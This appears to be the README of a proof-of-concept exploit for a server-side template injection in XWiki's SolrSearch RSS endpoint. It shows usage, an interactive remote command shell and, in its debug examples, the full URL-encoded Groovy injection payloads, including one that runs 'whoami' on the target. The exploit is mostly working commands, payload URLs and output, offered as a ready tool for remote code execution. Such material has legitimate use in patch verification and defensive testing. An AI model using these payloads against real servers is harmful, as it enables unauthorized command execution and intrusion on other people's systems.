## Infos
This PoC first tests for the SSTI and if it works.
It will go in loop and allows you to run commands remotly.
The `exec` and `shell` command do the same currently.
## Usage
### Connecting
```bash
python3 poc.py <target>
```
## Example
### With debug set to False (default)
```bash
python3 poc.py http://127.0.0.1:8080
[*] Targeting http://127.0.0.1:8080
[+] Target is vulnerable!
(xwiki-shell) > help
Documented commands (type help <topic>):
========================================
exec exit help shell
(xwiki-shell) > exec whoami
xwiki
```
### With debug set to True
The debug flag at the top of the script will show you the generated urls.
It will create a debug.log file in which contains the raw response of the request.
```bash
python3 poc.py http://127.0.0.1:8080
[*] Targeting http://127.0.0.1:8080
[DEBUG] URL used: http://127.0.0.1:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22XWIKI_TEST_123%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
[+] Target is vulnerable!
(xwiki-shell) > help
Documented commands (type help <topic>):
========================================
exec exit help shell
(xwiki-shell) > exec whoami
[DEBUG] URL used: http://127.0.0.1:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22whoami%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
xwiki
```
[4.0K] /data/pocs/a78ecf51dc71224eca2fef0d09779fccd86da84f
├── [ 10K] poc.py
└── [1.6K] README.md
1 directory, 2 files